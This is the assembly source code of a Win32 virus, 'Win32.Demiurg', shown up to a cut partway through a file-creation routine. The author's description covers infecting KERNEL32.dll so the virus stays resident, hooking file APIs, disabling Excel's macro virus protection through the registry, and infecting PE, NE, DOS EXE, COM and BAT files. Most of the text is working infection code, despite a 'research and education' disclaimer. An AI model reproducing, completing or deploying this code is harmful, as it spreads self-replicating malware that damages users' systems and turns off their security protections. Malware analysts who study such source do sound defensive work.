; ************************************************************************* ; ******************** ******************** ; ******************** Win32.Demiurg ******************** ; ******************** by ******************** ; ******************** Black Jack ******************** ; ******************** ******************** ; ************************************************************************* comment ~ NAME: Win32.Demiurg AUTHOR: Black Jack [independant Austrian Win32asm virus coder] CONTACT: Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack TYPE: Win32 global resident (in kernel32.dll) PE/NE/MZ/COM/BAT/XLS infector SIZE: 16354 bytes DESCRIPTION: The main instance of the virus is in infected PE EXE files (or the PE dropper). If such a file is executed, the first thing the virus does is getting the needed API addresses by standart methods (first it scans the hosts import table for the GetModuleHandleA API and uses it to get the KERNEL32 handle if found, if not, it gets it by the "scan down from the value from the top of stack"-trick, then the export table of KERNEL32 is scanned for all needed APIs, finally also ADVAPI32.dll is loaded and some APIs for registry operations fetched from there). Then the virus performs two tasks before returning to the host: first infected KERNEL32.dll, then infected MS-Excel. To infect KERNEL32.dll, it is copied from the system directory to the windows directory and infected there. The infection process is the same as with regular PE EXE files (see later), but not the main entry point is modified, but some file modification APIs are hooked (to maintain compatiblity to WinNT in both their ANSI and unicode versions). To replace the old KERNEL32.dll with the infected copy, the virus uses the MoveFileExA API with the MOVEFILE_DELAY_UNTIL_REBOOT flag; this will only work in WinNT, but this doesn't matter, because Win9x will use the copy in the windows directory rather than the one in the system directory after the next reboot anyways. To infect Excel, the virus checks the registry if a supported version (97 or 2000) is installed; if so, it turns the macro virus protection off and gets the path where it is installed. Then it drops a .xls file with a little macro as \xlstart\demiurg.xls; this file will be loaded automatically at the next start of excel, and the macro executed. Besides that, another macro source code is generated as C:\demiurg.sys file, that contains VBA instructions to write the virus PE dropper to C:\demiurg.exe and execute it. Please note that this macro uses 100% VBA instructions (the binary data is stored in Arrays), no stupid debug scripts. This file will be used to infect regular .xls files with. This means that the VBA instance of the virus is not a "full" macro virus, because it is not able to replicate from one .xls file to another directly. After the KERNEL32.dll infection, the virus will stay resident after the next reboot. It then catches most file API functions and infects COM, EXE (MZ, NE, PE) and BAT files as they are accessed. The PE EXE infection process is quite standart: The last section is increased, and the virus body is appended after the virtual end of the section. In my opinion this is much more logical than appending after the physical end, how it is done in most Win32 virii nowadays, because otherwise the virus body can be overwritten by host data (if the last section is the .bss section, for example). Besides that the virtual size is not aligned (although some compilers/assemblers like TASM align it to SectionAlign, this is not necessary), while the physical size is always aligned to FileAlign; this means we can save some space in some cases. Then the entry point is set to the virus body (in case of PE EXE files) and finally also the imagesize and the checksum (in case it was different to zero before infection) are updated to maintain compatiblity to WinNT; to recalculate the CRC the CheckSumMappedFile API from IMAGEHLP.dll is used. All other infectable files are only infected "indirectly": A small piece of code is added that drops a PE dropper and infects it. Because of that the virus can only replicate in Win32 enviroments, although it infects a lot of different filetypes. DOS EXE files are also infected in standart manner: some code is appended at the end of file, then the entrypoint and the stack are set to it, and the internal filesize is recalculated. Sligtly interesting is that the virus is able to infect files with internal overlays that were generated with borland compilers, in this case the virus is appended between the internal end of the file and the overlay, after the overlay has been shifted back. This works very fine (to my own surprise); try to infect TD.EXE for example. COM files are infected by internally converting them to EXE files by prepending a small EXE header, and then infected just like a DOS EXE file. Of course the virus is also able to deal with ENUNS files, in this case the ENUNS signature is threated just like an internal overlay. BAT files are infected by adding some BAT code at the end of the file, then the the character 1Ah (end of text file; BAT files will be only executed until this character is reached), and after that the PE dropper. The BAT code works by ECHOing out a small COM file (which was been written in such a careful way that it only contains characters that are legit in BAT files) to C:\DEMIURG.EXE. Then this file is executed with the name of the BAT file as parameter. Then the COM file reads the PE dropper from the end of the BAT file and writes it to C:\DEMIURG.EXE too, and then executes the new file. NE files are infected with the method that was introduced by Mark Ludwig (I think): The code segment that contains the entry point is increased, the rest of the file is shifted back and the NE header tables are fixed to reflect the new layout of the file. Then a small piece of code is injected into the newly gained room and the entrypoint set to it; besides that the PE dropper is appended at the end of the file as internal overlay. ASSEMBLE WITH: tasm32 /mx /m demiurg.asm tlink32 /Tpe /aa demiurg.obj,,, import32.lib there's no need for PEWRSEC or a similar tool, because the virus code is stored in the data section. DISCLAIMER: I do *NOT* support the spreading of viruses in the wild. Therefore, this source was only written for research and education. Please do not spread it. The author can't be hold responsible for what you decide to do with this source. ~ ; =========================================================================== workspace EQU 100000 virus_size EQU (virus_end-start) Extrn ExitProcess:Proc Extrn MessageBoxA:Proc .386 .model flat .data start: db 68h ; push imm32 orig_eip dd offset dummy_host ; push host entry point pushfd ; save flags pushad ; save all registers call delta ; get delta offset delta: pop ebp sub ebp, offset delta ; ----- GET KERNEL32 IMAGE BASE --------------------------------------------- db 0B8h ; mov eax, imm32 imagebase dd 400000h ; EAX=imagebase of host mov ebx, [eax+3Ch] ; EBX=new exe pointer RVA add ebx, eax ; EBX=new exe pointer VA mov ebx, [ebx+128] ; EBX=import directory RVA add ebx, eax ; EBX=import directory VA search_kernel32_descriptor: mov esi, [ebx+12] ; ESI=name of library RVA or esi, esi ; last import descriptor ? JZ failed ; if yes, we failed add esi, eax ; ESI=name of library VA lea edi, [ebp+offset kernel32name] ; EDI=name of kernel32 VA mov ecx, 8 ; ECX=length to compare cld ; clear direction flag rep cmpsb ; compare the two strings JE found_kernel32_descriptor ; if equal, we found it add ebx, 20 ; next import descriptor JMP search_kernel32_descriptor ; search on found_kernel32_descriptor: xor edx, edx ; EDX=0 - our counter push dword ptr [ebx+16] ; RVA of array of API RVAs mov ebx, [ebx] ; EBX=array of API name ptrs or ebx, ebx ; are there APIs imported ? JZ pop_failed ; if not, we failed add ebx, eax ; EBX=RVA API name ptrs array search_GetModuleHandle: mov esi, [ebx] ; ESI=RVA of a API name or esi, esi ; searched all API names? JZ pop_failed ; if yes, we failed test esi, 80000000h ; is it an ordinal ? JNZ next_API ; can't handle ordinal imports add esi, eax ; ESI=VA of API name inc esi ; skip the ordinal hint inc esi lea edi, [ebp+offset GetModuleHandleA] ; EDI=VA of GetModuleHandleA mov ecx, l_GMH ; ECX=length GetModuleHandleA cld ; clear direction flag rep cmpsb ; compare the two strings JE found_GetModuleHandle next_API: inc edx ; increment our API counter inc ebx ; EBX=ptr to next API name ptr inc ebx inc ebx inc ebx JMP search_GetModuleHandle ; try next API name found_GetModuleHandle: pop ebx ; EBX=RVA of array of API RVAs add ebx, eax ; EBX=VA of array of API RVAs mov ebx, [ebx+edx*4] ; EBX=GetModuleHandleA entry lea edx, [ebp+offset kernel32name] ; EDX=pointer to KERNEL32.dll push edx ; push it call ebx ; call GetModuleHandleA or eax, eax ; got kernel32 handle/base ? JNZ found_kernel32 ; if yes, we got it! JMP failed ; otherwise, try other method pop_failed: pop ebx ; remove shit from stack failed: ; import method failed? then ; try memory scanning method mov ebx, [esp+10*4] ; EBX=address inside kernel32 kernel32find: cmp dword ptr [ebx], "EP" ; found a PE header? JNE search_on_kernel32 ; if not, search on mov eax, [ebx+34h] ; EAX=module base address or al, al ; is it on a page start? JNZ search_on_kernel32 ; if not, search on cmp word ptr [eax], "ZM" ; is there a MZ header? JE found_kernel32 ; if yes, we found kernel32! search_on_kernel32: dec ebx ; go one byte down JMP kernel32find ; and search on found_kernel32: mov [ebp+offset kernel32], eax ; saver kernel32 base address lea esi, [ebp+offset kernel32_API_names_table] ; get APIs from lea edi, [ebp+offset kernel32_API_address_table]; KERNEL32.dll mov ecx, number_of_kernel32_APIs call GetAPIs lea eax, [ebp+offset advapi32_dll] ; load ADVAPI32.dll push eax call [ebp+offset LoadLibraryA] lea esi, [ebp+offset advapi32_API_names_table] ; get APIs from lea edi, [ebp+offset advapi32_API_address_table]; ADVAPI32.dll mov ecx, number_of_advapi32_APIs call GetAPIs call infect_kernel32 call infect_excel popad ; restore registers popfd ret ; return to host ; ----- END MAIN ROUTINE OF THE VIRUS --------------------------------------- copyright db "[The Demiurg] - a Win32 virus by Black Jack", 0 db "written in Austria in the year 2000", 0 ; ----- INFECT KERNEL32.DLL ------------------------------------------------- infect_kernel32: mov eax, [ebp+SetFileAttributesA] ; if we're already resident, sub eax, [ebp+GetFileAttributesA] ; we know the difference cmp eax, 2*API_hook_size ; between the two API entries: JE kernel32_infect_failure ; so don't reinfect kernel32. push 260 lea eax, [ebp+offset path_buffer1] push eax call [ebp+offset GetSystemDirectoryA] ; get the Windows System dir lea eax, [ebp+offset kernel32_dll] ; add \kernel32.dll to string push eax lea eax, [ebp+offset path_buffer1] push eax call [ebp+offset lstrcatA] push 260 ; get the Windows directory lea eax, [ebp+offset path_buffer2] push eax call [ebp+offset GetWindowsDirectoryA] lea eax, [ebp+offset kernel32_dll] ; add \kernel32.dll to string push eax lea eax, [ebp+offset path_buffer2] push eax call [ebp+offset lstrcatA] push 1 ; don't overwrite target lea eax, [ebp+offset path_buffer2] ; target push eax lea eax, [ebp+offset path_buffer1] ; source push eax call [ebp+offset CopyFileA] ; copy kernel32.dll from ; system to windows directory or eax, eax JZ kernel32_infect_failure lea edx, [ebp+offset path_buffer2] ; open and map the KERNEL32.dll call openfile ; in the windows directory mov ebx, eax add ebx, [eax+3Ch] ; EBX=kernel32 PE header push ebx ; save the PE header offset call append_PE ; infect KERNEL32.dll pop ebx ; EBX=Kernel32 PE header mov ecx, number_of_hooked_APIs ; ECX=number of APIs to hook lea esi, [ebp+offset hooked_API_names_table] ; ESI=names of APIs mov edi, (API_hooks - start) ; EDI=first API hook relative ; to virus start hook_APIs_loop: call hook_API ; hook this API mov eax, esi ; EAX=API name address next_hook_API_loop: inc eax ; search end of string cmp byte ptr [eax+1], 0 JNE next_hook_API_loop cmp byte ptr [eax], "A" ; ANSI version of API? JNE next_API_name mov byte ptr [eax], "W" ; hook also unicode version push eax call hook_API pop eax mov byte ptr [eax], "A" ; restore ANSI version name next_API_name: inc eax ; EAX=next API name inc eax xchg esi, eax ; ESI=next API name LOOP hook_APIs_loop ; hook next API finish_kernel32_infection: mov dword ptr [ebx+8], 666 ; destroy kernel32 build time call finish_PE_infection ; append virus body and ; recalculate checksum call closemap ; close map and file push 5 ; flags for MoveFileExA ; MOVEFILE_REPLACE_EXISTING + ; MOVEFILE_DELAY_UNTIL_REBOOT lea eax, [ebp+offset path_buffer1] ; target push eax lea eax, [ebp+offset path_buffer2] ; source push eax call [ebp+offset MoveFileExA] ; NOTE: This API call will ; only work in WinNT. But this ; is no problem, because Win9X ; will prefer the kernel32.dll ; in the Windows directory to ; the one in the System ; directory anyways. kernel32_infect_failure: RET ; ----- HOOK ONE API -------------------------------------------------------- hook_API: push ebx ; save registers push ecx push esi push ebx ; save EBX (PE hdr in memmap) push edi ; save EDI (hook "RVA") mov eax, [ebp+offset kernel32] ; EAX=KERNEL32 base address call My_GetProcAddress ; EDX=RVA of RVA of API in ; export table mov ecx, [edx+eax] ; ECX=API RVA add ecx, eax ; ECX=API VA pop edi ; EDI="RVA" of API hook pop ebx ; EBX=K32 PE header in memmap mov [edi+ebp+offset start+1], ecx ; store original API VA movzx ecx, word ptr [ebx+6] ; ECX=number of sections movzx eax, word ptr [ebx+14h] ; size of optional header lea ebx, [eax+ebx+18h] ; EBX=first section header ; 18h = size of file header search_section: mov esi, [ebx+0Ch] ; ESI=section RVA cmp esi, edx JA next_section add esi, [ebx+8] ; add section virtual size cmp esi, edx JA found_section next_section: add ebx, 40 ; 40 = section header size LOOP search_section section_not_found: JMP exit_hook_API found_section: sub edx, [ebx+0Ch] ; section RVA add edx, [ebx+14h] ; start of raw data ; EDX=physical offset of ; API RVA in K32 export table add edx, [ebp+offset mapbase] ; EDX=address in memmap mov eax, edi add eax, [ebp+offset virus_RVA] ; EAX=API hook RVA in K32 mov [edx], eax ; hook API exit_hook_API: add edi, API_hook_size ; EDI=next API hook pop esi pop ecx pop ebx RET ; ----- HOOKS FOR APIs ------------------------------------------------------ API_hooks: CreateFileA_hook: push 12345678h JMP hookA API_hook_size EQU ($ - offset CreateFileA_hook) CreateFileW_hook: push 12345678h JMP hookW GetFileAttributesA_hook: push 12345678h JMP hookA GetFileAttributesW_hook: push 12345678h JMP hookW SetFileAttributesA_hook: push 12345678h JMP hookA SetFileAttributesW_hook: push 12345678h JMP hookW CopyFileA_hook: push 12345678h JMP hookA CopyFileW_hook: push 12345678h JMP hookW MoveFileExA_hook: push 12345678h JMP hookA MoveFileExW_hook: push 12345678h JMP hookW MoveFileA_hook: push 12345678h JMP hookA MoveFileW_hook: push 12345678h JMP hookW _lopen_hook: push 12345678h hookA: pushf pusha call hookA_next hookA_next: pop ebp sub ebp, offset hookA_next mov edi, [esp+11*4] call infect popa popf RET hookW: pushf pusha call hookW_next hookW_next: pop ebp sub ebp, offset hookW_next mov esi, [esp+11*4] lea edi, [ebp+offset path_buffer1] push edi push 0 ; useless default character push 0 ; useless default character push 260 ; length of destination buffer push edi ; offset of destination buffer push -1 ; find length automatically push esi ; address of source buffer push 0 ; no special flags push 0 ; codepage: CP_ACP (ANSI) call dword ptr [ebp+WideCharToMultiByte] or eax, eax JZ WideCharToMultiByte_failed pop edi call infect WideCharToMultiByte_failed: popa popf RET ; ----- INFECT EXCEL -------------------------------------------------------- infect_excel: mov [ebp+office_version_number], "8" ; first try Excel97 (v8.0) try_excel: ; Open the RegKey with the ; MS-Excel Options lea eax, [ebp+offset reg_handle1] ; offset registry handle push eax push 2 ; access: KEY_SET_VALUE push 0 ; reserved lea eax, [ebp+offset regkey] ; which regkey push eax push 80000001h ; HKEY_CURRENT_USER call [ebp+offset RegOpenKeyExA] or eax, eax ; success=>EAX=0 JZ found_excel cmp [ebp+office_version_number], "9" ; already tried both versions? JE failure ; no excel found, we failed inc [ebp+office_version_number] ; try also Excel2000 JMP try_excel found_excel: cmp [ebp+office_version_number], "9" ; which version found ? JE unprotect_Excel2K unprotect_Excel97: lea eax, [ebp+offset reg_handle2] ; offset registry handle push eax push 2 ; access: KEY_SET_VALUE push 0 ; reserved lea eax, [ebp+offset subkey_97] ; which regkey push eax push dword ptr [ebp+offset reg_handle1] ; registry handle call [ebp+offset RegOpenKeyExA] or eax, eax ; success=>EAX=0 JNZ failure mov dword ptr [ebp+offset regvalue_dword], 0 ; 0 means Macro virus ; protection off lea edx, [ebp+offset regvalue_options] ; offset value name JMP general_unprotect unprotect_Excel2K: lea eax, [ebp+offset regvalue_dword] ; disposition (uninteresting) push eax lea eax, [ebp+offset reg_handle2] ; offset registry handle push eax push 0 ; security attributes push 6 ; access: KEY_SET_VALUE and ; KEY_CREATE_SUB_KEY push 0 ; REG_OPTION_NON_VOLATILE push 0 ; address of class string push 0 ; reserved lea eax, [ebp+offset subkey_2K] ; which regkey push eax push dword ptr [ebp+offset reg_handle1] ; registry handle call [ebp+RegCreateKeyExA] or eax, eax JNZ failure mov dword ptr [ebp+offset regvalue_dword], 1 ; 1 - lowest level of ; macro security lea edx, [ebp+offset regvalue_2K] ; offset value name general_unprotect: ; Now disable the MS-Excel ; macro virus protection. push 4 ; size of buffer lea eax, [ebp+offset regvalue_dword] ; address of buffer push eax push 4 ; REG_DWORD push 0 ; reserved push edx ; offset value name push [ebp+reg_handle2] ; reg handle call [ebp+offset RegSetValueExA] or eax, eax JNZ failure push [ebp+reg_handle2] ; Close the RegKey again call [ebp+offset RegCloseKey] or eax, eax JNZ failure push [ebp+reg_handle1] ; Close the RegKey again call [ebp+offset RegCloseKey] or eax, eax JNZ failure ; Open the RegKey where we ; will find the path to Excel lea eax, [ebp+offset reg_handle1] ; offset registry handle push eax push 1 ; access: KEY_QUERY_VALUE push 0 ; reserved lea eax, [ebp+offset regkey] ; which regkey push eax push 80000002h ; HKEY_LOCAL_MACHINE call [ebp+offset RegOpenKeyExA] or eax, eax ; success=>EAX=0 JNZ failure lea eax, [ebp+offset reg_handle2] ; offset registry handle push eax push 1 ; access: KEY_QUERY_VALUE push 0 ; reserved lea eax, [ebp+offset subkey_InstallRoot]; which regkey push eax push dword ptr [ebp+offset reg_handle1] ; reg handle call [ebp+offset RegOpenKeyExA] or eax, eax ; success=>EAX=0 JNZ failure ; Get the path where MS-Excel ; is installed lea eax, [ebp+offset size_buffer] ; address of data buffer size mov dword ptr [eax], 260 ; set size of data buffer push eax lea eax, [ebp+offset path_buffer1] ; address of data buffer push eax lea eax, [ebp+offset REG_SZ] ; address of buffer for value push eax ; type (ASCIIZ string) push 0 ; reserved lea eax, [ebp+offset regvalue_path] ; address of name of value push eax ; to query push [ebp+reg_handle2] ; handle of RegKey to query call [ebp+offset RegQueryValueExA] or eax, eax JNZ failure push [ebp+reg_handle1] ; close the RegKey call [ebp+offset RegCloseKey] or eax, eax JNZ failure push [ebp+reg_handle2] ; close the RegKey call [ebp+offset RegCloseKey] or eax, eax JNZ failure lea eax, [ebp+offset demiurg_xls] ; add "\xlstart\demiurg.xls" push eax ; (our macro dropper file) lea eax, [ebp+offset path_buffer1] ; to the Excel path push eax call [ebp+offset lstrcatA] lea edx, [ebp+offset path_buffer1] ; create this file call createfile JC failure lea esi, [ebp+offset macro_dropper] ; decompress our macro dropper mov edi, eax ; file to the filemap mov ebx, macro_dropper_size call decompress mov dword ptr [ebp+filesize], 16384 ; filesize of macro dropper call closemap ; close the macro dropper file push dropper_size ; allocate memory where we can push 0 ; create the PE virus dropper call [ebp+offset GlobalAlloc] or eax, eax JZ failure mov [ebp+heap_buffer], eax ; save memory base address xchg edi, eax ; EDI=address of allocated mem call create_dropper lea edx, [ebp+offset macro_filename] ; create the file for the call createfile ; macro dropper code source JC failure ; that will be used to infect ; excel files xchg edi, eax ; EDI=base of memmap lea esi, [ebp+offset main_macro_code] ; copy main VBA code to there mov ecx, main_macro_code_size cld rep movsb mov byte ptr [ebp+sub_name], "b" ; name of the first VBA sub mov esi, [ebp+heap_buffer] ; ESI=PE dropper image in mem mov ecx, (dropper_size / 128) ; ECX=number of a=Array(...) ; lines that are left build_subs_loop: push esi ; save ESI lea esi, [ebp+offset sub_header] ; copy "Sub b()" movsd ; move 9 bytes movsd movsb pop esi ; restore ESI mov eax, (((dropper_size / 128)+5)/6) ; number of lines in one sub cmp ecx, eax ; last sub? JB push_0 ; ECX=0 afterwards (no more ; lines left) sub ecx, eax ; otherwise ECX=number of ; lines left push ecx ; save it mov ecx, eax ; ECX=nr. of lines in one sub JMP build_lines_loop push_0: push 0 build_lines_loop: push ecx ; save number of lines left mov eax, "rA=a" ; add string "a=Array(" stosd mov eax, "(yar" stosd mov ecx, 128 ; ECX=numbers in one line build_nubers_loop: push ecx ; save ECX xor eax, eax ; EAX=0 lodsb ; AL=one byte from dropper mov ecx, 3 ; ECX=3 (nuber of digits) number_loop_head: xor edx, edx ; EDX=0 (high dword for div) mov ebx, 10 ; EBX=10 div ebx ; EDX=mod, EAX=div add dl, '0' ; DL=one digit push edx ; save it LOOP number_loop_head pop eax ; AL=one digit stosb ; store it pop eax ; AL=next digit stosb pop eax stosb mov al, ',' ; store a comma stosb pop ecx ; ECX=number of bytes left LOOP build_nubers_loop dec edi mov eax, ")" + 0A0D00h + "w"*1000000h ; add ")CRLFwCRLF" stosd mov ax, 0A0Dh stosw pop ecx ; restore number of lines left LOOP build_lines_loop push esi ; save ESI lea esi, [ebp+offset end_sub] ; store an "end sub" movsd ; move 9 bytes movsd movsb pop esi ; restore ESI inc byte ptr [ebp+sub_name] ; new name for next sub pop ecx ; ECX=number of lines left or ecx, ecx JNZ build_subs_loop sub edi, [ebp+mapbase] ; EDI=size of VBA code mov [ebp+filesize], edi ; save it as filesize call closemap ; close the map/file push [ebp+heap_buffer] ; free allocated memory call [ebp+GlobalFree] failure: RET ; ----- INFECT FILE --------------------------------------------------------- infect: push edi xor eax, eax ; EAX=0 mov ecx, eax ; ECX=0 dec ecx ; ECX=0FFFFFFFFh cld ; clear direction flag repne scasb ; search for end of filename mov eax, [edi-5] ; EAX=filename extension or eax, 20202020h ; make it lowercase pop edx cmp eax, "exe." ; EXE file? JE infect_exe_com cmp eax, "moc." ; COM file? JE infect_exe_com cmp eax, "tab." ; BAT file? JNE quit_infect_error ; ----- INFECT BAT FILE ----------------------------------------------------- infect_bat: call openfile ; open and map the victim JC quit_infect_error ; opening/mapping failed ? xchg edi, eax ; EDI=start of memmap add edi, [ebp + offset filesize] ; EDI=end of file in memmap cmp byte ptr [edi-1], 0 ; already infected? JE already_infected lea esi, [ebp + offset bat_virus_code] ; ESI=BAT code to add mov ecx, size_bat_virus_code cld rep movsb ; add BAT code call create_dropper ; add PE dropper as overlay add dword ptr [ebp + offset filesize], (size_bat_virus_code+dropper_size) JMP abort_infection ; ----- INFECT A EXE OR COM FILE -------------------------------------------- infect_exe_com: call openfile ; open and map the victim JC quit_infect_error ; opening/mapping failed ? cmp word ptr [eax], "ZM" ; has it a MZ header? JE infect_exe cmp word ptr [eax], "MZ" ; has it a MZ header? JE infect_exe ; ----- INFECT COM FILE ----------------------------------------------------- infect_com: mov ecx, [ebp+offset filesize] ; ECX=size of victim file mov esi, ecx dec esi add esi, [ebp+offset mapbase] ; ESI=end of file in memmap mov edi, esi add edi, 32 std rep movsb ; shift whole file back lea esi, [ebp+offset new_mz_header] ; prepend the MZ header mov edi, [ebp+offset mapbase] mov ebx, new_mz_header_size call decompress mov eax, [ebp+offset filesize] ; update filesize add eax, 32 mov [ebp+filesize], eax mov ebx, [ebp+offset mapbase] cmp word ptr [eax+ebx-4], "SN" ; ENUNS check JNE no_enun add word ptr [eax+ebx-2], 1234h ; fix ENUNS shit org $-2 ; otherwise TASM will give a dw (((size_dos_virus_code+15+dropper_size)/16)*16); warning, dunno why sub eax, 7 ; make the ENUNS an overlay no_enun: xor edx, edx ; calculate filesize for mov ecx, 512 ; MZ header div ecx or edx, edx ; mod JZ no_page_roundup inc eax ; div no_page_roundup: mov [ebx+2], edx mov [ebx+4], eax xchg eax, ebx ; now infect it as regular EXE ; ----- EXE FILE INFECTION -------------------------------------------------- infect_exe: cmp word ptr [eax+12h], "JB" ; already infected? JE already_infected mov word ptr [eax+12h], "JB" ; mark as infectd cmp word ptr [eax+18h], 40h JE new_exe ; ----- DOS EXE INFECTION --------------------------------------------------- dos_exe: mov bx, [eax+0Eh] ; save relo_SS mov [ebp+relo_SS], bx mov bx, [eax+10h] ; save SP_start mov [ebp+SP_start], bx mov bx, [eax+14h] ; save IP_start mov [ebp+IP_start], bx mov bx, [eax+16h] ; save relo_CS mov [ebp+relo_CS], bx movzx ebx, word ptr [eax+2] ; calculate internal filesize movzx ecx, word ptr [eax+4] or ebx, ebx JZ no_page_round dec ecx no_page_round: mov eax, 512 mul ecx add eax, ebx mov [ebp+offset dos_exe_size], eax cmp [ebp+offset filesize], eax ; has it an internal overlay? JE no_internal_overlays with_overlay: mov esi, [ebp+offset mapbase] cmp dword ptr [eax+esi], "VOBF" ; internal overlay of borland? JE infectable_overlay cmp word ptr [eax+esi+3], "SN" ; ENUNS COM file converted ; by us before? JNE abort_infection infectable_overlay: mov ecx, [ebp+filesize] ; shift internal overlay back mov esi, ecx sub ecx, eax dec esi add esi, [ebp+mapbase] mov edi, esi add edi, (((size_dos_virus_code+15+dropper_size)/16)*16) std rep movsb no_internal_overlays: add dword ptr [ebp+filesize], (((size_dos_virus_code+15+dropper_size)/16)*16) add dword ptr [ebp+dos_exe_size], (((size_dos_virus_code+15+dropper_size)/16)*16) mov ebx, [ebp+mapbase] mov edi, eax add edi, ebx lea esi, [ebp+offset dos_virus_code] mov ecx, size_dos_virus_code cld rep movsb call create_dropper xor edx, edx mov ecx, 16 div ecx ; EDX:EAX / ECX ; EAX=DIV, EDX=MOD sub ax, [ebx+08h] ; size of header (paragr) ; EAX=virus segment mov word ptr [ebx+0Eh], ax ; new relo_SS mov word ptr [ebx+10h], 6000h ; new SP_start mov word ptr [ebx+14h], dx ; new IP_start mov word ptr [ebx+16h], ax ; new relo_CS mov eax, [ebp+dos_exe_size] xor edx, edx mov ecx, 512 div ecx or edx, edx ; mod JZ no_page_roundup_ inc eax ; div no_page_roundup_: mov [ebx+2], dx mov [ebx+4], ax JMP abort_infection ; ----- IT IS A NEW EXE FILE ------------------------------------------------ new_exe: mov ebx, [eax+3Ch] ; EBX=new header offset add ebx, eax ; EBX=new header in memmap cmp dword ptr [ebx], "EP" ; PE file? JE infect_PE cmp word ptr [ebx], "EN" ; NE file? JNE abort_infection ; ----- INFECT A NE EXE FILE ------------------------------------------------ infect_NE: mov edi, [ebp+offset filename_ofs] mov esi, edi search_pure_filename: cmp byte ptr [edi], "\" JNE no_backslash mov esi, edi no_backslash: cmp byte ptr [edi], 0 JE found_end_filename inc edi JMP search_pure_filename found_end_filename: inc esi lea edi, [ebp+offset our_filename] cld movsd movsd movsd xchg ebx, eax mov cx, [eax+32h] ; CX=align shift or cx, cx ; align shift zero? JNZ align_ok ; if not, it's alright mov cx, 9 ; if so, use default (512 byt) align_ok: or ch, ch ; alignment too big? JNZ abort_infection ; if so, then close mov [ebp+offset shift_value], cl ; store align shift value mov [ebp+offset shift_value2], cl ; store again shift value mov ebx, size_NE_virus_code ; EBX=virus length shr ebx, cl inc ebx ; EBX=aligned length shl ebx, cl movzx esi, word ptr [eax+24h] ; ESI=resource table in file add esi, eax ; ESI=resource table in map cmp cx, [esi] ; file align=resource align? JNE abort_infection ; if not, then close inc esi ; esi=1st TypeInfo inc esi mov [ebp+offset resource_table], esi ; save start of resource table movzx edx, word ptr [eax+16h] ; EDX=number of code sect. dec edx ; count starts with one shl edx, 3 ; 1 sect. header=8 bytes movzx ecx, word ptr [eax+22h] ; ECX=start of segment table add edx, ecx ; EDX=segment header in file add edx, eax ; EDX=segment header of start ; code segment in mapped mem movzx ecx, word ptr [edx+2] ; ECX=segment size in file or ecx, ecx ; 64K segment? JZ abort_infection ; if so, exit cmp [edx+6], cx ; cmp with size in mem JNE abort_infection ; exit if not equal push word ptr [eax+14h] ; save old start ip pop word ptr [ebp+offset NE_start_IP] mov [eax+14h], cx ; set new one add [edx+2], bx ; fixup physical segment size add [edx+6], bx ; fixup virtual segment size movzx edi, word ptr [edx] ; start of segment in file push ecx mov cl, [ebp+offset shift_value] shl edi, cl ; start of segment in bytes pop ecx add edi, ecx ; add size of segment mov esi, [ebp+offset filesize] mov ecx, esi sub ecx, edi ; length to move dec esi add esi, [ebp+offset mapbase] push edi ; save virus start add [ebp+offset filesize], ebx ; fixup filesize mov edi, esi add edi, ebx std rep movsb pop edi push edi add edi, [ebp+offset mapbase] lea esi, [ebp+offset NE_virus_code] mov ecx, ebx cld rep movsb pop edx ; EDX=virus start in file mov cl, [ebp+offset shift_value] shr ebx, cl ; EBX=virus size in alignment units movzx esi, word ptr [eax+22h] ; start of segment table add esi, eax ; ESI=segment table in map movzx ecx, word ptr [eax+1Ch] ; ECX=number of segments segment_loop_head: movzx eax, word ptr [esi] ; EAX=offset of resource db 0C1h, 0E0h ; shl eax, imm8 shift_value db ? cmp eax, edx ; resource ofs > virus start? JL segment_ok add word ptr [esi], bx ; fix up resource offset segment_ok: add esi, 8 LOOP segment_loop_head mov esi, [ebp+offset resource_table] resources_loop_head: cmp word ptr [esi], 0 ; end of TypeInfo table? JE done_resources movzx ecx, word ptr [esi+2] ; Resource count lea edi, [esi+8] ; NameInfo Array NameInfo_loop_head: movzx eax, word ptr [edi] ; EAX=offset of resource db 0C1h, 0E0h ; shl eax, imm8 shift_value2 db ? cmp eax, edx ; resource ofs > virus start? JL resource_ok add word ptr [edi], bx ; fix up resource offset resource_ok: add edi, 12 LOOP NameInfo_loop_head mov esi, edi JMP resources_loop_head done_resources: mov edi, [ebp + offset mapbase] add edi, [ebp + offset filesize] call create_dropper add dword ptr [ebp + offset filesize], dropper_size JMP abort_infection ; ----- INFECT A PE EXE FILE ------------------------------------------------ infect_PE: push ebx ; save PE header pointer call append_PE ; modify last sect. for virus mov ebx, [ebp+offset virus_RVA] ; EBX=RVA of virus in victim xchg ebx, [eax+28h] ; set as new entrypoint, save ; old entryRVA in EBX mov ecx, [eax+34h] ; ECX=imagebase mov [ebp+offset imagebase], ecx ; save it add ebx, ecx ; EBX=entry VA mov [ebp+orig_eip], ebx ; save it pop ebx ; EBX=PE header pointer call finish_PE_infection ; append virus, recalc CRC already_infected: abort_infection: call closemap ; close filemap and file quit_infect_error: RET ; ----- END INFECT FILE ----------------------------------------------------- openfile: mov [ebp+offset filename_ofs], edx push edx ; offset filename call [ebp+offset GetFileAttributesA] mov [ebp+attributes], eax inc eax JNZ get_attribs_ok stc ret get_attribs_ok: push 80h ; normal attributes push dword ptr [ebp+offset filename_ofs] call [ebp+offset SetFileAttributesA] or eax, eax JNZ kill_attribs_ok stc ret kill_attribs_ok: push 0 ; template file (shit) push 80h ; file attributes (normal) push 3 ; open existing push 0 ; security attributes (shit) push 0 ; do not share file push 0C0000000h ; read/write mode push dword ptr [ebp+offset filename_ofs] ; pointer to filename call [ebp+offset CreateFileA] mov [ebp+filehandle], eax inc eax ; EAX= -1 (Invalid handle val) JNZ open_ok stc ret open_ok: lea eax, [ebp+offset LastWriteTime] push eax sub eax, 8 push eax sub eax, 8 push eax push dword ptr [ebp+offset filehandle] call [ebp+offset GetFileTime] or eax, eax JNZ get_time_ok call closefile stc ret get_time_ok: push 0 ; high filesize dword ptr push dword ptr [ebp+offset filehandle] call [ebp+offset GetFileSize] mov [ebp+offset filesize], eax inc eax JNZ get_filesize_ok call closefile stc ret get_filesize_ok: add eax, workspace-1 JMP mapfile createfile: mov [ebp+offset filename_ofs], edx push 0 ; template file (shit) push 80h ; file attributes (normal) push 1 ; create new file (failure if ; old one exists) push 0 ; security attributes (shit) push 0 ; do not share file push 0C0000000h ; read/write mode push edx ; pointer to filename call [ebp+offset CreateFileA] mov [ebp+offset filehandle], eax inc eax ; EAX= -1 (Invalid handle val) JNZ createfile_ok stc RET createfile_ok: mov dword ptr [ebp+offset attributes], 80h lea edi, [ebp+offset CreationTime] xor eax, eax mov ecx, 6 rep stosw mov [ebp+offset 